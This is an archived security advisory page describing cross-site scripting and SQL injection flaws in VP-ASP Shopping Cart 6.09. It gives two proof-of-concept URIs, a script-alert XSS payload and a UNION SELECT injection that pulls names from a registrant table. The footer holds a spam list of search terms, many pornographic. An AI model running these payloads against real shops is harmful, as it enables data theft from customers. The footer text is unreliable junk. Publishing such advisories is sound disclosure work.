about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , VP-ASP Shopping Cart Multiple Input Validation Vulnerabilities


Title VP-ASP Shopping Cart Multiple Input Validation Vulnerabilities
Published 2007-01-11-12:00AM
Updated 2007-01-12-05:50PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  ajann is credited with the discovery of these vulnerabilities.
Vulnerable  VPASP Shopping Cart 6.09
Not Vulnerable  
Code   To exploit a cross-site scritping issue:

An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI.

The following proof-of-concept URI is available:

http://example.com/[path]/shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E

To exploit an SQL-injection issue:

An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://example.com/[path]/shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 00:40:46 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
analsex.co blue filim shejipeixu www.tuve8. Cisco Cata www.sakila ProFTP FULSEX php includ news for c PHP Advanc porn anels www.sex100 Www.thrish hand job 700 xxx ////////co Sexfotos iis exploi news for C maxcpm.inf Sex girs entry p...3Fopti www lalats php-nuke 2 _____ ___ www.ftv sw news for C vaps.de socalcoeds Prnerotic arab sex v School sex lineage Sn@per usa SEX www.sexyfu videosexo arab sex v news for c SOUTH www.chuang www.backch www.pc139. PHP guestb www.bbgxxw apache 1.3 www.lscsdl sage